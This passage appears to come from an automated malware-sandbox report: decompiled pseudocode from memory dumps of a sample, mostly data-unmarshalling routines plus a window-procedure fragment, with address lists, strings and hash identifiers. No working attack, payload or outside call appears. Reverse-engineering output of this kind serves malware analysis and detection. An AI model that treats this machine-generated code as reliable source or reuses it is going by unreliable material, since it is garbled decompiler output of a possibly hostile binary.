                                                                                              					while(( *( *(_t246 + 0x10)) & 0x000000ff) != 0x5b) {
                                                                                              						 *(_t246 - 0xc) =  *( *(_t246 + 0x10)) & 0x000000ff;
                                                                                              						 *(_t246 - 0xc) =  *(_t246 - 0xc) - 1;
                                                                                              						if( *(_t246 - 0xc) > 0xb8) {
                                                                                              							L46:
                                                                                              							0x6f1d0000("unhandled format %d\n",  *( *(_t246 + 0x10)) & 0x000000ff);
                                                                                              							_t250 = _t250 + 8;
                                                                                              							L47:
                                                                                              							 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[1]);
                                                                                              							continue;
                                                                                              						}
                                                                                              						L3:
                                                                                              						_t23 =  *(_t246 - 0xc) + 0x6f1d9b24; // 0xcccccc0f
                                                                                              						switch( *((intOrPtr*)(( *_t23 & 0x000000ff) * 4 +  &M6F1D9AE0))) {
                                                                                              							case 0:
                                                                                              								L4:
                                                                                              								E6F1DAFA0( *((intOrPtr*)(_t246 + 8)),  *(_t246 + 0xc), 1);
                                                                                              								_push( *(_t246 + 0xc));
                                                                                              								_push( *( *(_t246 + 0xc)) & 0x0000ffff);
                                                                                              								_push("byte=%d => %p\n");
                                                                                              								0x6f1d0000();
                                                                                              								_t250 = _t250 + 0x18;
                                                                                              								 *(_t246 + 0xc) =  &(( *(_t246 + 0xc))[0]);
                                                                                              								goto L47;
                                                                                              							case 1:
                                                                                              								L5:
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                                                                                              								_push( *( *(__ebp + 0xc)) & 0x0000ffff);
                                                                                              								_push("short=%d => %p\n");
                                                                                              								0x6f1d0000();
                                                                                              								__esp = __esp + 0xc;
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 0xc) + 2;
                                                                                              								 *(__ebp + 0xc) = __ecx;
                                                                                              								goto L47;
                                                                                              							case 2:
                                                                                              								L9:
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								__eax =  *( *(__ebp + 0xc));
                                                                                              								_push( *( *(__ebp + 0xc)));
                                                                                              								_push("long=%d => %p\n");
                                                                                              								0x6f1d0000();
                                                                                              								__esp = __esp + 0xc;
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 0xc) + 4;
                                                                                              								 *(__ebp + 0xc) = __ecx;
                                                                                              								goto L47;
                                                                                              							case 3:
                                                                                              								L12:
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 8);
                                                                                              								__eax = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								asm("cvtss2sd xmm0, [eax]");
                                                                                              								__esp = __esp - 8;
                                                                                              								asm("movsd [esp], xmm0");
                                                                                              								_push("float=%f => %p\n");
                                                                                              								0x6f1d0000();
                                                                                              								__esp = __esp + 0x10;
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 0xc) + 4;
                                                                                              								 *(__ebp + 0xc) = __ecx;
                                                                                              								goto L47;
                                                                                              							case 4:
                                                                                              								L13:
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								__eax =  *(__edx + 4);
                                                                                              								_push(__eax);
                                                                                              								__ecx =  *__edx;
                                                                                              								_push(__ecx);
                                                                                              								0x6f1d0000();
                                                                                              								__esp = __esp + 8;
                                                                                              								_push(__eax);
                                                                                              								_push("longlong=%s => %p\n");
                                                                                              								0x6f1d0000();
                                                                                              								__esp = __esp + 0xc;
                                                                                              								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                              								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                              								goto L47;
                                                                                              							case 5:
                                                                                              								L14:
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 8);
                                                                                              								__eax = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								__esp = __esp - 8;
                                                                                              								asm("movsd xmm0, [eax]");
                                                                                              								asm("movsd [esp], xmm0");
                                                                                              								_push("double=%f => %p\n");
                                                                                              								0x6f1d0000();
                                                                                              								__esp = __esp + 0x10;
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 0xc) + 8;
                                                                                              								 *(__ebp + 0xc) = __ecx;
                                                                                              								goto L47;
                                                                                              							case 6:
                                                                                              								L6:
                                                                                              								__edx = __ebp - 4;
                                                                                              								 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8), __ebp - 4, 2);
                                                                                              								__ecx =  *(__ebp - 4) & 0x0000ffff;
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__edx =  *( *(__ebp + 0xc));
                                                                                              								_push( *( *(__ebp + 0xc)));
                                                                                              								_push("enum16=%d => %p\n");
                                                                                              								0x6f1d0000();
                                                                                              								__esp = __esp + 0xc;
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								if( *( *(__ebp + 0xc)) > 0x7fff) {
                                                                                              									_push(0x6f5);
                                                                                              									__eax =  *0x6f1d0000();
                                                                                              								}
                                                                                              								L8:
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 0xc) + 4;
                                                                                              								 *(__ebp + 0xc) = __ecx;
                                                                                              								goto L47;
                                                                                              							case 7:
                                                                                              								L15:
                                                                                              								 *(__ebp - 0x1c) = 0;
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								_push("pointer => %p\n");
                                                                                              								0x6f1d0000();
                                                                                              								__esp = __esp + 8;
                                                                                              								__eax =  *(__ebp + 0x10);
                                                                                              								__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                              								if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                              									__edx =  *(__ebp + 0x10);
                                                                                              									 *(__ebp + 0x14) =  *(__ebp + 0x10);
                                                                                              								}
                                                                                              								__eax =  *(__ebp + 0x14);
                                                                                              								__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                              								if(__ecx != 0x11) {
                                                                                              									 *(__ebp + 8) =  *(__ebp + 8) + 4;
                                                                                              									__eax = E6F1D73D0(__ecx,  *(__ebp + 8) + 4, 4);
                                                                                              								}
                                                                                              								__eax =  *(__ebp + 8);
                                                                                              								__ecx =  *(__eax + 4);
                                                                                              								 *(__ebp - 0x20) =  *(__eax + 4);
                                                                                              								__edx =  *(__ebp + 8);
                                                                                              								if( *( *(__ebp + 8) + 0x34) == 0) {
                                                                                              									__ecx =  *(__ebp + 0x14);
                                                                                              									__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                              									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                              										 *(__ebp + 8) = E6F1DAF00( *(__ebp + 8), 4);
                                                                                              									}
                                                                                              								} else {
                                                                                              									__eax =  *(__ebp + 8);
                                                                                              									__ecx =  *(__ebp + 8);
                                                                                              									__edx =  *(__ecx + 0x34);
                                                                                              									 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
                                                                                              									__eax =  *(__ebp + 8);
                                                                                              									 *( *(__ebp + 8) + 0x34) = 0;
                                                                                              									 *(__ebp - 0x1c) = 1;
                                                                                              								}
                                                                                              								__ecx =  *(__ebp + 0x18) & 0x000000ff;
                                                                                              								__edx =  *(__ebp + 0x14);
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								__ecx =  *( *(__ebp + 0xc));
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								__eax =  *(__ebp - 0x20);
                                                                                              								__ecx =  *(__ebp + 8);
                                                                                              								__eax = E6F1DB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
                                                                                              								if( *(__ebp - 0x1c) == 0) {
                                                                                              									L29:
                                                                                              									__edx =  *(__ebp + 0x10);
                                                                                              									__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                              									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                              										 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                              										 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                              									} else {
                                                                                              										__ecx =  *(__ebp + 0x14);
                                                                                              										__ecx =  *(__ebp + 0x14) + 4;
                                                                                              										 *(__ebp + 0x14) = __ecx;
                                                                                              									}
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              									goto L47;
                                                                                              								} else {
                                                                                              									do {
                                                                                              										L24:
                                                                                              										__edx =  *(__ebp + 8);
                                                                                              										__eax =  *(__edx + 0x14);
                                                                                              										_push( *(__edx + 0x14));
                                                                                              										__ecx =  *(__ebp + 8);
                                                                                              										__edx =  *( *(__ebp + 8));
                                                                                              										__eax =  *(__ebp + 8);
                                                                                              										 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
                                                                                              										_push( *(__eax + 4) -  *(__edx + 8));
                                                                                              										_push("buffer=%d/%d\n");
                                                                                              										0x6f1d0000();
                                                                                              										__esp = __esp + 0xc;
                                                                                              										__edx =  *(__ebp + 8);
                                                                                              										__eax =  *( *(__ebp + 8));
                                                                                              										__ecx =  *(__eax + 8);
                                                                                              										__edx =  *(__ebp + 8);
                                                                                              										__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                              										__eax =  *(__ebp + 8);
                                                                                              										if( *( *(__ebp + 8) + 4) > __ecx) {
                                                                                              											__ecx =  *(__ebp + 8);
                                                                                              											__edx =  *( *(__ebp + 8));
                                                                                              											__eax =  *(__edx + 8);
                                                                                              											__ecx =  *(__ebp + 8);
                                                                                              											__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                              											__edx =  *(__ebp + 8);
                                                                                              											 *(__edx + 4) =  *(__edx + 4) - __eax;
                                                                                              											_push( *(__edx + 4) - __eax);
                                                                                              											_push("buffer overflow %d bytes\n");
                                                                                              											0x6f1d0000();
                                                                                              											__esp = __esp + 8;
                                                                                              										}
                                                                                              										__edx = 0;
                                                                                              									} while (0 != 0);
                                                                                              									__eax =  *(__ebp + 8);
                                                                                              									__ecx =  *(__ebp + 8);
                                                                                              									__edx =  *(__ecx + 4);
                                                                                              									 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
                                                                                              									__eax =  *(__ebp + 8);
                                                                                              									__ecx =  *(__ebp - 0x20);
                                                                                              									 *( *(__ebp + 8) + 4) = __ecx;
                                                                                              									__edx =  *(__ebp + 0x14);
                                                                                              									__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                              									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                              										__ecx =  *(__ebp + 8);
                                                                                              										__eax = E6F1DAF00( *(__ebp + 8), 4);
                                                                                              									}
                                                                                              									goto L29;
                                                                                              								}
                                                                                              							case 8:
                                                                                              								L33:
                                                                                              								__ecx =  *(__ebp - 0x10);
                                                                                              								__edx = __ebp + 0xc;
                                                                                              								__eax = E6F1D7480(__ecx, __ebp + 0xc, __ecx, 2);
                                                                                              								goto L47;
                                                                                              							case 9:
                                                                                              								L34:
                                                                                              								__eax =  *(__ebp - 0x10);
                                                                                              								__ecx = __ebp + 0xc;
                                                                                              								__eax = E6F1D7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
                                                                                              								goto L47;
                                                                                              							case 0xa:
                                                                                              								L35:
                                                                                              								__edx =  *(__ebp - 0x10);
                                                                                              								__ebp + 0xc = E6F1D7480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
                                                                                              								goto L47;
                                                                                              							case 0xb:
                                                                                              								L36:
                                                                                              								__ecx =  *(__ebp + 0x10);
                                                                                              								 *( *(__ebp + 0x10)) & 0x000000ff = ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
                                                                                              								 *(__ebp + 0xc) = E6F1E0730( *(__ebp + 0xc), 0, ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c);
                                                                                              								__ecx =  *(__ebp + 0x10);
                                                                                              								__edx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 0xc) + ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
                                                                                              								 *(__ebp + 0xc) = __ecx;
                                                                                              								goto L47;
                                                                                              							case 0xc:
                                                                                              								goto L0;
                                                                                              							case 0xd:
                                                                                              								L45:
                                                                                              								goto L47;
                                                                                              							case 0xe:
                                                                                              								L10:
                                                                                              								__edx = __ebp - 0x24;
                                                                                              								 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8), __ebp - 0x24, 4);
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__edx =  *(__ebp - 0x24);
                                                                                              								 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__edx =  *__ecx;
                                                                                              								_push( *__ecx);
                                                                                              								_push("int3264=%ld => %p\n");
                                                                                              								0x6f1d0000();
                                                                                              								__esp = __esp + 0xc;
                                                                                              								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              								goto L47;
                                                                                              							case 0xf:
                                                                                              								L11:
                                                                                              								__ecx = __ebp - 0x28;
                                                                                              								__edx =  *(__ebp + 8);
                                                                                              								E6F1DAFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp - 0x28);
                                                                                              								 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								__ecx =  *( *(__ebp + 0xc));
                                                                                              								_push(__ecx);
                                                                                              								_push("uint3264=%ld => %p\n");
                                                                                              								0x6f1d0000();
                                                                                              								__esp = __esp + 0xc;
                                                                                              								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              								goto L47;
                                                                                              							case 0x10:
                                                                                              								goto L46;
                                                                                              						}
                                                                                              					}
                                                                                              					return  *(_t246 + 0xc);
                                                                                              				}
                                                                                              			}






                                                                                              0x6f1d95c7
                                                                                              0x6f1d95c8
                                                                                              0x6f1d95cd
                                                                                              0x6f1d95d2
                                                                                              0x6f1d95db
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d95e3
                                                                                              0x6f1d95e5
                                                                                              0x6f1d95ed
                                                                                              0x6f1d95f5
                                                                                              0x6f1d95f8
                                                                                              0x6f1d95f9
                                                                                              0x6f1d95fc
                                                                                              0x6f1d95ff
                                                                                              0x6f1d9600
                                                                                              0x6f1d9605
                                                                                              0x6f1d960a
                                                                                              0x6f1d960d
                                                                                              0x6f1d9610
                                                                                              0x6f1d9613
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d9671
                                                                                              0x6f1d9673
                                                                                              0x6f1d967b
                                                                                              0x6f1d9683
                                                                                              0x6f1d9686
                                                                                              0x6f1d9687
                                                                                              0x6f1d968a
                                                                                              0x6f1d968c
                                                                                              0x6f1d968d
                                                                                              0x6f1d9692
                                                                                              0x6f1d9697
                                                                                              0x6f1d969a
                                                                                              0x6f1d969d
                                                                                              0x6f1d96a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d9726
                                                                                              0x6f1d9728
                                                                                              0x6f1d972c
                                                                                              0x6f1d9730
                                                                                              0x6f1d9738
                                                                                              0x6f1d973b
                                                                                              0x6f1d973c
                                                                                              0x6f1d973f
                                                                                              0x6f1d9743
                                                                                              0x6f1d9746
                                                                                              0x6f1d974b
                                                                                              0x6f1d9750
                                                                                              0x6f1d9755
                                                                                              0x6f1d9758
                                                                                              0x6f1d975b
                                                                                              0x6f1d975e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d9766
                                                                                              0x6f1d9768
                                                                                              0x6f1d9770
                                                                                              0x6f1d9778
                                                                                              0x6f1d977b
                                                                                              0x6f1d977c
                                                                                              0x6f1d977f
                                                                                              0x6f1d9782
                                                                                              0x6f1d9783
                                                                                              0x6f1d9785
                                                                                              0x6f1d9786
                                                                                              0x6f1d978b
                                                                                              0x6f1d978e
                                                                                              0x6f1d978f
                                                                                              0x6f1d9794
                                                                                              0x6f1d9799
                                                                                              0x6f1d979f
                                                                                              0x6f1d97a2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d97aa
                                                                                              0x6f1d97ac
                                                                                              0x6f1d97b0
                                                                                              0x6f1d97b4
                                                                                              0x6f1d97bc
                                                                                              0x6f1d97bf
                                                                                              0x6f1d97c0
                                                                                              0x6f1d97c3
                                                                                              0x6f1d97c6
                                                                                              0x6f1d97ca
                                                                                              0x6f1d97cf
                                                                                              0x6f1d97d4
                                                                                              0x6f1d97d9
                                                                                              0x6f1d97dc
                                                                                              0x6f1d97df
                                                                                              0x6f1d97e2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d961b
                                                                                              0x6f1d961d
                                                                                              0x6f1d9625
                                                                                              0x6f1d962d
                                                                                              0x6f1d9631
                                                                                              0x6f1d9634
                                                                                              0x6f1d9636
                                                                                              0x6f1d9639
                                                                                              0x6f1d963a
                                                                                              0x6f1d963d
                                                                                              0x6f1d963f
                                                                                              0x6f1d9640
                                                                                              0x6f1d9645
                                                                                              0x6f1d964a
                                                                                              0x6f1d964d
                                                                                              0x6f1d9656
                                                                                              0x6f1d9658
                                                                                              0x6f1d965d
                                                                                              0x6f1d965d
                                                                                              0x6f1d9663
                                                                                              0x6f1d9663
                                                                                              0x6f1d9666
                                                                                              0x6f1d9669
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d97ea
                                                                                              0x6f1d97ea
                                                                                              0x6f1d97f1
                                                                                              0x6f1d97f4
                                                                                              0x6f1d97f5
                                                                                              0x6f1d97fa
                                                                                              0x6f1d97ff
                                                                                              0x6f1d9802
                                                                                              0x6f1d9805
                                                                                              0x6f1d980b
                                                                                              0x6f1d980d
                                                                                              0x6f1d9810
                                                                                              0x6f1d9810
                                                                                              0x6f1d9813
                                                                                              0x6f1d9816
                                                                                              0x6f1d981c
                                                                                              0x6f1d9823
                                                                                              0x6f1d9827
                                                                                              0x6f1d982c
                                                                                              0x6f1d982f
                                                                                              0x6f1d9832
                                                                                              0x6f1d9835
                                                                                              0x6f1d9838
                                                                                              0x6f1d983f
                                                                                              0x6f1d9860
                                                                                              0x6f1d9863
                                                                                              0x6f1d9869
                                                                                              0x6f1d9871
                                                                                              0x6f1d9876
                                                                                              0x6f1d9841
                                                                                              0x6f1d9841
                                                                                              0x6f1d9844
                                                                                              0x6f1d9847
                                                                                              0x6f1d984a
                                                                                              0x6f1d984d
                                                                                              0x6f1d9850
                                                                                              0x6f1d9857
                                                                                              0x6f1d9857
                                                                                              0x6f1d9879
                                                                                              0x6f1d987e
                                                                                              0x6f1d9882
                                                                                              0x6f1d9885
                                                                                              0x6f1d9888
                                                                                              0x6f1d988c
                                                                                              0x6f1d9890
                                                                                              0x6f1d9894
                                                                                              0x6f1d98a0
                                                                                              0x6f1d9935
                                                                                              0x6f1d9935
                                                                                              0x6f1d9938
                                                                                              0x6f1d993e
                                                                                              0x6f1d994e
                                                                                              0x6f1d9951
                                                                                              0x6f1d9940
                                                                                              0x6f1d9940
                                                                                              0x6f1d9943
                                                                                              0x6f1d9946
                                                                                              0x6f1d9946
                                                                                              0x6f1d9957
                                                                                              0x6f1d995a
                                                                                              0x00000000
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a9
                                                                                              0x6f1d98ac
                                                                                              0x6f1d98ad
                                                                                              0x6f1d98b0
                                                                                              0x6f1d98b2
                                                                                              0x6f1d98b8
                                                                                              0x6f1d98bb
                                                                                              0x6f1d98bc
                                                                                              0x6f1d98c1
                                                                                              0x6f1d98c6
                                                                                              0x6f1d98c9
                                                                                              0x6f1d98cc
                                                                                              0x6f1d98ce
                                                                                              0x6f1d98d1
                                                                                              0x6f1d98d4
                                                                                              0x6f1d98d7
                                                                                              0x6f1d98dd
                                                                                              0x6f1d98df
                                                                                              0x6f1d98e2
                                                                                              0x6f1d98e4
                                                                                              0x6f1d98e7
                                                                                              0x6f1d98ea
                                                                                              0x6f1d98ed
                                                                                              0x6f1d98f3
                                                                                              0x6f1d98f5
                                                                                              0x6f1d98f6
                                                                                              0x6f1d98fb
                                                                                              0x6f1d9900
                                                                                              0x6f1d9900
                                                                                              0x6f1d9903
                                                                                              0x6f1d9903
                                                                                              0x6f1d9907
                                                                                              0x6f1d990a
                                                                                              0x6f1d990d
                                                                                              0x6f1d9910
                                                                                              0x6f1d9913
                                                                                              0x6f1d9916
                                                                                              0x6f1d9919
                                                                                              0x6f1d991c
                                                                                              0x6f1d991f
                                                                                              0x6f1d9925
                                                                                              0x6f1d9929
                                                                                              0x6f1d992d
                                                                                              0x6f1d9932
                                                                                              0x00000000
                                                                                              0x6f1d9925
                                                                                              0x00000000
                                                                                              0x6f1d9962
                                                                                              0x6f1d9964
                                                                                              0x6f1d9968
                                                                                              0x6f1d996c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d9979
                                                                                              0x6f1d997b
                                                                                              0x6f1d997f
                                                                                              0x6f1d9983
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d9990
                                                                                              0x6f1d9992
                                                                                              0x6f1d999a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d99a7
                                                                                              0x6f1d99a7
                                                                                              0x6f1d99ad
                                                                                              0x6f1d99b7
                                                                                              0x6f1d99bf
                                                                                              0x6f1d99c2
                                                                                              0x6f1d99c5
                                                                                              0x6f1d99c8
                                                                                              0x6f1d99cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d9ab5
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              • no unmarshaller for embedded type %02x, xrefs: 6F1D9A91
                                                                                              • embedded complex (size=%d) => %p, xrefs: 6F1D9A19
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: embedded complex (size=%d) => %p$no unmarshaller for embedded type %02x
                                                                                              • API String ID: 2102423945-1287812044
                                                                                              • Opcode ID: 84780ae00972486c86fd2039dfd866eabb45a7375e373314c1419629633dca0c
                                                                                              • Instruction ID: 055725f03028416a7dcb25ce9f9ab022960fc5d6cb27450abd31b1fab1c21d37
                                                                                              • Opcode Fuzzy Hash: 84780ae00972486c86fd2039dfd866eabb45a7375e373314c1419629633dca0c
                                                                                              • Instruction Fuzzy Hash: 5D313CB5900249AFCB08CF98C8A1AEF7BB5BF89351F14C159F9559B244D334EA60CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 37%
                                                                                              			E6F1D46B0(intOrPtr _a4, intOrPtr* _a8, void* _a12, signed int _a16) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				void* _t62;
                                                                                              				void* _t65;
                                                                                              
                                                                                              				0x6f1d0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				_a12 = _a12 + 1;
                                                                                              				_v12 = E6F1DF410(_a4,  &_a12);
                                                                                              				0x6f1d0000("unmarshalled discriminant %x\n", _v12);
                                                                                              				_t65 = _t62 + 0x24;
                                                                                              				_a12 =  *_a12 + _a12;
                                                                                              				_v8 =  *_a12;
                                                                                              				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              					_a16 = 1;
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) != 0) {
                                                                                              					 *_a8 =  *0x6f1d0000(_a4, _v8 & 0x0000ffff);
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) != 0) {
                                                                                              					E6F1E0730( *_a8, 0, _v8 & 0x0000ffff);
                                                                                              					_t65 = _t65 + 0xc;
                                                                                              				}
                                                                                              				return E6F1DED20(_a4, _a8, _v12, _a12, 0);
                                                                                              			}








                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: (%p, %p, %p, %d)$unmarshalled discriminant %x
                                                                                              • API String ID: 2102423945-139691638
                                                                                              • Opcode ID: 06814a2a946486fb8a28402e3bef1e79f7d8c7eb43cdf98f69fb6242d3c32524
                                                                                              • Instruction ID: a8b3f783e29d95d359b8b756b96b5aba8ab2a7f96d9adf7d6ce98f7b557f48f8
                                                                                              • Opcode Fuzzy Hash: 06814a2a946486fb8a28402e3bef1e79f7d8c7eb43cdf98f69fb6242d3c32524
                                                                                              • Instruction Fuzzy Hash: 512162B5600249ABCB04CF64DC90EAF7BB9BF49345F048559FD198B245E731EA60CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00404C19(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                              				long _t22;
                                                                                              
                                                                                              				if(_a8 != 0x102) {
                                                                                              					if(_a8 != 0x200) {
                                                                                              						_t22 = _a16;
                                                                                              						L7:
                                                                                              						if(_a8 == 0x419 &&  *0x429fc0 != _t22) {
                                                                                              							 *0x429fc0 = _t22;
                                                                                              							E0040592B(0x429fd8, 0x42f000);
                                                                                              							E00405889(0x42f000, _t22);
                                                                                              							E0040140B(6);
                                                                                              							E0040592B(0x42f000, 0x429fd8);
                                                                                              						}
                                                                                              						L11:
                                                                                              						return CallWindowProcA( *0x429fc8, _a4, _a8, _a12, _t22);
                                                                                              					}
                                                                                              					if(IsWindowVisible(_a4) == 0) {
                                                                                              						L10:
                                                                                              						_t22 = _a16;
                                                                                              						goto L11;
                                                                                              					}
                                                                                              					_t22 = E00404598(_a4, 1);
                                                                                              					_a8 = 0x419;
                                                                                              					goto L7;
                                                                                              				}
                                                                                              				if(_a12 != 0x20) {
                                                                                              					goto L10;
                                                                                              				}
                                                                                              				E00403D29(0x413);
                                                                                              				return 0;
                                                                                              			}





                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00404C4F
                                                                                              • CallWindowProcA.USER32 ref: 00404CBD
